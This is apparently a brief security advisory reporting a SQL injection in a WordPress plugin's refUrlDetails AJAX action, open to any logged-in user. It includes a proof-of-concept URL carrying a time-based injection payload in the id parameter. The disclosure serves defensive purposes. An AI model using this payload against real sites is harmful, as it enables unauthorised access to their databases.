The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the refUrlDetails AJAX action, available to any authenticated user, leading to a SQL injection
https://example.com/wp-admin/admin-ajax.php?action=refUrlDetails&id=sleep(1)%20--%20g